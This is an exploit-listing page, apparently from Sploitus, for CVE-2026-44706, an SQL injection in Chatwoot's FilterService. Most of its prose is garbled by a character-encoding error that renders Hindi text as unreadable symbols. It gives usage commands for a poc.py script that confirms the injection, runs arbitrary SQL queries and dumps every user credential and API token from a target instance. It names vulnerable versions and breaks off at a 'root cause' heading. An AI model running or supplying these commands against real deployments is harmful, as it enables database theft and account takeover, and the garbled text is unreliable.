Sploitus

Exploit for CVE-2026-44706

kitploit ┬╖ 2026-09-06

Exploit Code

MARKDOWN30 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HAKAIOFFSEC-CVE-2026-44706
# Chatwoot FilterService рдореЗрдВ SQL Injection

CVE-2026-44706 рдХреЗ рд▓рд┐рдП рдПрдХ рдкреНрд░реВрдл-рдСрдл-рдХреЙрдиреНрд╕реЗрдкреНрдЯ рдПрдХреНрд╕рдкреНрд▓реЙрдЗрдЯ, Chatwoot рдХреЗ `FilterService#lt_gt_filter_values` рдореЗрдВ SQL рдЗрдВрдЬреЗрдХреНрд╢рди рднреЗрджреНрдпрддрд╛, рдЬреЛ рдХрд┐рд╕реА рднреА рдкреНрд░рдорд╛рдгрд┐рдд рдПрдЬреЗрдВрдЯ рдХреЛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдФрд░ API рдЯреЛрдХрди рд╕рд╣рд┐рдд рдкреВрд░реЗ PostgreSQL рдбреЗрдЯрд╛рдмреЗрд╕ рдХреЛ рдкрдврд╝рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИред рдкреВрд░рд╛ рд▓реЗрдЦ рдпрд╣рд╛рдБ рдкрдврд╝реЗрдВред

рдЙрдкрдпреЛрдЧ:

root@kitploit:~
    
    
    # рдЗрдВрдЬреЗрдХреНрд╢рди рд╕рддреНрдпрд╛рдкрд┐рдд рдХрд░реЗрдВ (рдмреВрд▓рд┐рдпрди-рдЖрдзрд╛рд░рд┐рдд)
    $ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
    
    # рд╕рдордп-рдЖрдзрд╛рд░рд┐рдд рдкреБрд╖реНрдЯрд┐
    $ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
    
    # рдордирдорд╛рдирд╛ SQL рдХреНрд╡реЗрд░реА рдкрд░рд┐рдгрд╛рдо рдирд┐рдХрд╛рд▓реЗрдВ
    $ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
    
    # рд╕рднреА рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдФрд░ API рдЯреЛрдХрди рдбрдВрдк рдХрд░реЗрдВ
    $ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds
    

## рд╕рдВрд╡реЗрджрдирд╢реАрд▓ рд╕рдВрд╕реНрдХрд░рдг

  * Chatwoot тЙд 4.11.1



## рдореВрд▓ рдХрд╛рд░рдг